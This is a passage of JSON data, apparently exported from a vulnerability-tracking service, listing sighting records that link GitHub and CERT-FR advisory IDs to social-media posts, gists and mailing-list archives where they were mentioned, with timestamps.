"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4j66-8f4r-3pjx", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3luorfvupsb2w", "content": "", "creation_timestamp": "2025-07-24T05:10:24.785596Z"}, {"uuid": "9b0ae56d-ea28-40e3-8434-83a7faf8b92b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/390241ac454a5995a1bd42029b758da1", "content": "", "creation_timestamp": "2025-10-26T10:13:26.000000Z"}, {"uuid": "a6600a4e-4c47-4192-9471-219fa3e4b919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/390241ac454a5995a1bd42029b758da1", "content": "", "creation_timestamp": "2025-10-26T10:13:26.000000Z"}, {"uuid": "df6bc5df-9ca6-4389-b84f-9f20647f0c87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p8hw-rfjg-689h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115304586574138947", "content": "", "creation_timestamp": "2025-10-02T12:32:45.320539Z"}, {"uuid": "68bc752e-1360-4ddf-8549-78c991037651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/390241ac454a5995a1bd42029b758da1", "content": "", "creation_timestamp": "2025-10-26T10:13:26.000000Z"}, {"uuid": "6c9c046a-a8cb-4ff9-90d4-5664b9a3c7a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w2hg-2v4p-vmh6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115304586574138947", "content": "", "creation_timestamp": "2025-10-02T12:32:45.383004Z"}, {"uuid": "5d6ed6f7-4f09-4bfc-a831-cf3ad10cd835", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7232-97c6-j525", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115304596433685168", "content": "", "creation_timestamp": "2025-10-02T12:35:15.927108Z"}, {"uuid": "369c4fc0-1324-4f4e-af3c-160ea3d82054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p3x5-mvmp-5f35", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115304596433685168", "content": "", "creation_timestamp": "2025-10-02T12:35:16.089602Z"}, {"uuid": "ace5ceb3-57b3-474a-9daf-192219fc2218", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7425-4qpj-v4w3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115304596433685168", "content": "", "creation_timestamp": "2025-10-02T12:35:16.250107Z"}, {"uuid": "0930d79a-9545-48cd-afe1-d3cbe41fc125", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3g72-chj4-2228", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115304596433685168", "content": "", "creation_timestamp": "2025-10-02T12:35:16.013965Z"}, {"uuid": "4bfd4e32-9dcc-4b86-b553-9bb1e9a40d01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xch9-h8qw-85c7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115304596433685168", "content": "", "creation_timestamp": "2025-10-02T12:35:16.170081Z"}, {"uuid": "424eb08b-9e62-4966-9b53-3e3c92050f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-472f-vmf2-pr3h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115304596433685168", "content": "", "creation_timestamp": "2025-10-02T12:35:16.327363Z"}, {"uuid": "1fefb90b-b1ef-4367-9006-c258c9800bce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "4b954fea-4c53-4841-962e-3b146812968f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8wpw-vfgm-qrrr", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/213", "content": "", "creation_timestamp": "2025-11-27T16:02:24.000000Z"}, {"uuid": "2b823052-f57e-4001-ad93-6dcc18327b8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/6d326d82c106078cb7d1ed31ad37e3dc", "content": "", "creation_timestamp": "2025-10-26T10:16:49.000000Z"}, {"uuid": "7c90b3d8-25d1-4531-8af5-316bb34c05a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/6d326d82c106078cb7d1ed31ad37e3dc", "content": "", "creation_timestamp": "2025-10-26T10:16:49.000000Z"}, {"uuid": "455f90c9-4fe0-48af-a2cb-7e4303484fec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/6d326d82c106078cb7d1ed31ad37e3dc", "content": "", "creation_timestamp": "2025-10-26T10:16:49.000000Z"}, {"uuid": "9e9ca9be-5cb4-4cbb-b716-804441770c33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9hjg-9r4m-mvj7", "type": "seen", "source": "https://gist.github.com/Token-Eater/3d3edb1aabe326b71377581a9ce3b805", "content": "", "creation_timestamp": "2025-11-05T11:55:10.000000Z"}, {"uuid": "af8ee299-6d51-4336-9ba1-bcd21cd9ed0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/59299c7a612be7a27ce4cee24019182d", "content": "", "creation_timestamp": "2025-10-26T10:42:38.000000Z"}, {"uuid": "7828ae82-0963-4a98-86d2-1cb934bff73b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/9a45991491fc328bb9bae6c4b4373147", "content": "", "creation_timestamp": "2025-10-26T10:42:33.000000Z"}, {"uuid": "a8513559-ebe3-48af-89a2-0482fc171745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/9a45991491fc328bb9bae6c4b4373147", "content": "", "creation_timestamp": "2025-10-26T10:42:33.000000Z"}, {"uuid": "b8c11fd5-160c-4345-bd01-3d7dd757a766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9wx4-h78v-vm56", "type": "seen", "source": "https://gist.github.com/Token-Eater/3d3edb1aabe326b71377581a9ce3b805", "content": "", "creation_timestamp": "2025-11-05T11:55:10.000000Z"}, {"uuid": "f0456b01-97e2-4da5-b3dd-35705c28c324", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "19248798-c5b3-49c9-8b4d-c84d67d7001a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/0be95f882bdfda0f4207d2066d205edb", "content": "", "creation_timestamp": "2025-10-26T10:51:02.000000Z"}, {"uuid": "9c97062a-f049-407d-a285-c9c54ae39348", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/0be95f882bdfda0f4207d2066d205edb", "content": "", "creation_timestamp": "2025-10-26T10:51:02.000000Z"}, {"uuid": "acdd5043-d483-492b-9aff-562ba777fba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7j3j-qj83-9qv4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115306188305230182", "content": "", "creation_timestamp": "2025-10-02T19:20:05.846763Z"}, {"uuid": "3e3f1780-f31f-4734-bd3d-573a62f40a6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/0be95f882bdfda0f4207d2066d205edb", "content": "", "creation_timestamp": "2025-10-26T10:51:02.000000Z"}, {"uuid": "a9fa80d3-3dd5-4c1c-9cc4-59f5a342dd52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7j3j-qj83-9qv4", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3m2abkq5yid2w", "content": "", "creation_timestamp": "2025-10-02T19:20:40.007554Z"}, {"uuid": "ce4f71d8-5e7a-4687-b2c4-ce9b5ad18cda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/305a267e4eff1c36fe3fbdd5519185b4", "content": "", "creation_timestamp": "2025-10-26T10:52:46.000000Z"}, {"uuid": "b7ad76c8-f1d2-4179-a302-3c0cc7aeeb04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/305a267e4eff1c36fe3fbdd5519185b4", "content": "", "creation_timestamp": "2025-10-26T10:52:46.000000Z"}, {"uuid": "f038b1a5-e21e-4734-b7cd-493ddfee1a9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/305a267e4eff1c36fe3fbdd5519185b4", "content": "", "creation_timestamp": "2025-10-26T10:52:46.000000Z"}, {"uuid": "add4931e-2e5f-4815-af03-bb56d5105c27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/9a45991491fc328bb9bae6c4b4373147", "content": "", "creation_timestamp": "2025-10-26T10:42:33.000000Z"}, {"uuid": "38978085-61f7-44fe-bf8c-4ef22e9d6847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/dc8d2a57a6175649dac12baac1462dee", "content": "", "creation_timestamp": "2025-10-26T11:48:23.000000Z"}, {"uuid": "ff8c045e-27c6-4d71-85be-41e06d27cff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/dc8d2a57a6175649dac12baac1462dee", "content": "", "creation_timestamp": "2025-10-26T11:48:23.000000Z"}, {"uuid": "81d1af42-106d-4cd2-ab8c-3ed189023000", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4cxx-hrm3-49rm", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lvhsk6yo5e2s", "content": "", "creation_timestamp": "2025-08-03T04:07:15.536893Z"}, {"uuid": "a001b39d-6721-4b0c-b362-c344c4c05de2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-66rw-q8w5-c2hg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115372746126553647", "content": "", "creation_timestamp": "2025-10-14T13:26:37.398808Z"}, {"uuid": "523ad23e-3efa-4657-a5ef-b93a42bfb1d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/c209a8e1e2337e0106bb3974e56b05d3", "content": "", "creation_timestamp": "2025-10-26T12:07:59.000000Z"}, {"uuid": "8650f193-bd78-4fa9-a14c-a493c3553e9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/c209a8e1e2337e0106bb3974e56b05d3", "content": "", "creation_timestamp": "2025-10-26T12:07:59.000000Z"}, {"uuid": "82327c54-2f84-4100-8823-297ed2865eaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/c209a8e1e2337e0106bb3974e56b05d3", "content": "", "creation_timestamp": "2025-10-26T12:07:59.000000Z"}, {"uuid": "c4ebc8eb-9375-4fc3-9ca4-6d708dbc5995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/c209a8e1e2337e0106bb3974e56b05d3", "content": "", "creation_timestamp": "2025-10-26T12:07:59.000000Z"}, {"uuid": "cc3fbc84-7064-4b1b-9707-292ad7afe519", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r2fh-jr9c-9pxh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115372754053187636", "content": "", "creation_timestamp": "2025-10-14T13:28:38.292770Z"}, {"uuid": "a55da4b0-255b-45cd-9316-1bd4efb00e7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcg3-q754-cr77", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115544635697187712", "content": "", "creation_timestamp": "2025-11-13T22:00:24.064304Z"}, {"uuid": "1f969b3b-5b89-4d02-b283-359e67a19802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f3q3-rmf7-9655", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115372754053187636", "content": "", "creation_timestamp": "2025-10-14T13:28:38.369279Z"}, {"uuid": "3898b594-b6a8-43a1-91d2-bba7e6a9b909", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "c3c1b11b-62d6-4f61-8120-8ed7d1ee025a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7gwh-mw97-qjgp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115372761539343120", "content": "", "creation_timestamp": "2025-10-14T13:30:32.493128Z"}, {"uuid": "abd9286e-c4d4-415c-8d72-7e956de703ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h3c9-cmh8-7qpj", "type": "seen", "source": "https://www.cert.at/de/warnungen/2023/4/kritische-sicherheitslucke-in-nextcloud-und-nextcloud-enterprise-updates-verfugbar", "content": "", "creation_timestamp": "2023-04-03T12:26:26.000000Z"}, {"uuid": "1f3dd4b7-c572-4722-bd19-1002efc7b4e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qhxp-v273-g94h", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lyrhkwlxt72c", "content": "", "creation_timestamp": "2025-09-14T04:33:01.332584Z"}, {"uuid": "ab96cd80-2fba-459f-a004-a9730c4973c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9493-h29p-rfm2", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/115497683553103053", "content": "", "creation_timestamp": "2025-11-05T14:59:52.189452Z"}, {"uuid": "2d7eb5ad-3cf0-440b-b791-2881cae8326e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-032", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lvl7z56ibm26", "content": "", "creation_timestamp": "2025-08-04T12:46:14.791845Z"}, {"uuid": "2d00ff49-1937-40fd-8756-861a2cc4ced2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-032", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lvlmyiagdq2c", "content": "", "creation_timestamp": "2025-08-04T16:38:31.560572Z"}, {"uuid": "0f5a4f4c-accd-4c5f-8845-13a4829bd37f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qw9x-cqr3-wc7r", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/115497683553103053", "content": "", "creation_timestamp": "2025-11-05T14:59:52.355889Z"}, {"uuid": "4acb60f2-4bf0-4246-877b-db0b37424628", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "1474de50-f282-4049-a49c-fa07b465d3bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6q4x-m86j-gfwj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115650540529991732", "content": "", "creation_timestamp": "2025-12-02T14:53:23.559635Z"}, {"uuid": "5324050c-d71a-438a-962f-fece56144c89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgrx-mc8f-2prm", "type": "seen", "source": "https://mstdn.social/users/jschauma/statuses/115497683553103053", "content": "", "creation_timestamp": "2025-11-05T14:59:52.605407Z"}, {"uuid": "2dd5d5ab-8055-4e86-b19e-29e2eed77f44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "4406666a-4ac7-4abb-9d7b-e5eac82c5bfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/HPCCSmoketest/81fe7fa0f9bae63884ef27e8cf3666fb", "content": "", "creation_timestamp": "2025-10-07T12:02:22.000000Z"}, {"uuid": "c6fc7ee4-d46f-4351-bd28-96a4f4d4771a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/topickapp.bsky.social/post/3lyi4s2szbq2j", "content": "", "creation_timestamp": "2025-09-10T11:26:12.474974Z"}, {"uuid": "a1749034-5624-44d7-a029-a0fec8fc1731", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c8g6-qrwh-m3vp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115463464052334833", "content": "", "creation_timestamp": "2025-10-30T13:57:22.975912Z"}, {"uuid": "69c7c400-353b-4452-be63-cfaa2f2a93b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4wg-gqfr-rpjm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115646350174352459", "content": "", "creation_timestamp": "2025-12-01T21:07:43.720638Z"}, {"uuid": "0a68def4-4a78-4779-9930-09109f79bebb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mp93-8vxr-hqq9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115646350174352459", "content": "", "creation_timestamp": "2025-12-01T21:07:43.816997Z"}, {"uuid": "97e2ff94-2272-454a-85b6-5c463c616bb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-050", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m6f5ha5kol2w", "content": "", "creation_timestamp": "2025-11-24T15:31:12.638220Z"}, {"uuid": "aaf9938e-2df7-4827-96e5-6304f0cc05c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ph6w-f82w-28w6", "type": "seen", "source": "https://bsky.app/profile/checkmarxzero.bsky.social/post/3lyihqgwlrt2k", "content": "", "creation_timestamp": "2025-09-10T14:42:09.913011Z"}, {"uuid": "027ad0fe-a5d1-4cf3-a557-be8a6478355b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59j7-ghrg-fj52", "type": "seen", "source": "https://gist.github.com/konard/56695a267047c69787214c94a8e6f9b6", "content": "", "creation_timestamp": "2025-11-29T17:22:46.000000Z"}, {"uuid": "dd913d3e-e62e-498a-9eca-4ff6d95e04f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/56695a267047c69787214c94a8e6f9b6", "content": "", "creation_timestamp": "2025-11-29T17:22:46.000000Z"}, {"uuid": "121a8b81-8673-44a1-8274-c132ac2cf6d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6ghx-6vpv-3wg7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115464061089942098", "content": "", "creation_timestamp": "2025-10-30T16:29:13.097276Z"}, {"uuid": "ef3076de-680f-4aad-8312-f85d637877cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxxx-xxxx-xxxx", "type": "seen", "source": "https://gist.github.com/knqyf263/c383be7ce9749cd462eefba79dd1a319", "content": "", "creation_timestamp": "2025-10-16T15:12:46.000000Z"}, {"uuid": "4236bc09-d8e2-4249-9130-68ca8db1dc77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xgp7-7qjq-vg47", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115464161009772231", "content": "", "creation_timestamp": "2025-10-30T16:54:37.696629Z"}, {"uuid": "ddb49c53-d05b-471a-b31e-731f1ca7714f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrpp-h998-j3pp", "type": "seen", "source": "https://gist.github.com/agentsoflearning/1bf9487d66ee4aca48a899a47be41e25", "content": "", "creation_timestamp": "2025-11-09T09:16:12.000000Z"}, {"uuid": "ae737ad5-c6e8-4cda-b760-025676373bc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-049", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m6bpb7au252j", "content": "", "creation_timestamp": "2025-11-23T06:39:18.797833Z"}, {"uuid": "5e120c24-4189-4ba8-b11b-abef97911642", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xfjh-gf9p-8qr6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115572328894338005", "content": "", "creation_timestamp": "2025-11-18T19:23:08.590730Z"}, {"uuid": "9f10eae4-ae28-4b24-b6a0-32bb6d32a41f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-29xp-372q-xqph", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115464435491893188", "content": "", "creation_timestamp": "2025-10-30T18:04:26.992799Z"}, {"uuid": "5159c7c1-e800-4ba3-b51c-e16dfd08ff0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-051", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115620913416794951", "content": "", "creation_timestamp": "2025-11-27T09:18:51.743301Z"}, {"uuid": "a61b33e8-0b78-4d79-bfd7-76828ff7afb1", "vulnerability_lookup_origin": 